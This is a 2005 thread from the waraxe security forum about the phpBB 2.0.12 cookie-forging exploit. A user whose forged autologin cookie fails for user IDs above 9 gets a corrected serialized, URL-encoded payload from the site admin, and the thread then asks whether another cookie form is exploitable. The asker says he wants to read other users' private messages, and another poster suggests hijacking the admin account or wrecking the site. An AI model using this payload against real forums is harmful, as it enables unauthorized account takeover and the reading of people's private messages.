Waraxe IT Security Portal
Login or Register
November 16, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 71
Members: 0
Total: 71
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> The .12 exploit. Quick question.
Post new topicReply to topic View previous topic :: View next topic
The .12 exploit. Quick question.
PostPosted: Thu Mar 31, 2005 10:04 pm Reply with quote
devn00b
Regular user
Regular user
Joined: Feb 20, 2005
Posts: 22




I noticed that if you try to change user ID >9 the exploit stops working.

Is there a way arround this? or am I missing somthing when creating the cookie?
View user's profile Send private message
PostPosted: Fri Apr 01, 2005 12:11 pm Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




Dude just edit admin to the way you want or login as admin and then change the user through the admin panel. Or just screw the site up. Its your call.

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Fri Apr 01, 2005 3:52 pm Reply with quote
devn00b
Regular user
Regular user
Joined: Feb 20, 2005
Posts: 22




Quote:
Dude just edit admin to the way you want or login as admin and then change the user through the admin panel. Or just screw the site up. Its your call.


See thats my problem, not all websites have an admin user <9. So i try to login and it just doesnt work.

example:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%2210%22%3B%7D

That should if im doing this right log me into user 10, however it just logs me in as guest.

Im not interested in screwing sites up, just reading a few pm's Wink.
View user's profile Send private message
PostPosted: Sat Apr 02, 2005 1:30 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




devn00b wrote:
Quote:
Dude just edit admin to the way you want or login as admin and then change the user through the admin panel. Or just screw the site up. Its your call.


See thats my problem, not all websites have an admin user <9. So i try to login and it just doesnt work.

example:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%2210%22%3B%7D

That should if im doing this right log me into user 10, however it just logs me in as guest.

Im not interested in screwing sites up, just reading a few pm's Wink.


If you urldecode() that stuff, you get this:

Code:

a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"10";}


This is serialized data and you can see, that it says "string with length 1 char and with value '10' ". Can you spot the error ? Smile

Right version is this:

Code:

a:2:{s:11:"autologinid";b:1;s:6:"userid";s:2:"10";}


And in urlencoded style it will be as

Code:

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A2%3A%2210%22%3B%7D


See ya! Wink
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Apr 02, 2005 10:03 pm Reply with quote
devn00b
Regular user
Regular user
Joined: Feb 20, 2005
Posts: 22




Hey thanks for the response Waraxe. I knew it was somthing dumb I was missing. Isnt that always the case? Very Happy
View user's profile Send private message
PostPosted: Sun Apr 03, 2005 10:27 am Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




devn00b wrote:
Hey thanks for the response Waraxe. I knew it was somthing dumb I was missing. Isnt that always the case? Very Happy


LOL , sometimes maybe you just to nervous Rolling Eyes Wink

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Tue Apr 05, 2005 5:38 pm Reply with quote
devn00b
Regular user
Regular user
Joined: Feb 20, 2005
Posts: 22




Okay last question I swear. Ive noticed a strange cookie from some sites

s%3A0%3A%22%22%3B wich = s:0:"";

is this exploitable if i do some modifications to the normal cookie sploit?
View user's profile Send private message
PostPosted: Wed Apr 06, 2005 11:27 am Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




You sure its not a forum with the 2.0.13 fix on? Maybe heavily modified forums?

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Wed Apr 06, 2005 1:04 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




devn00b wrote:
Okay last question I swear. Ive noticed a strange cookie from some sites

s%3A0%3A%22%22%3B wich = s:0:"";

is this exploitable if i do some modifications to the normal cookie sploit?


Maybe this cookie is set up, when user have anonymous status (i mean, does not have uid/uname).
View user's profile Send private message Send e-mail Visit poster's website
The .12 exploit. Quick question.
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.047 Seconds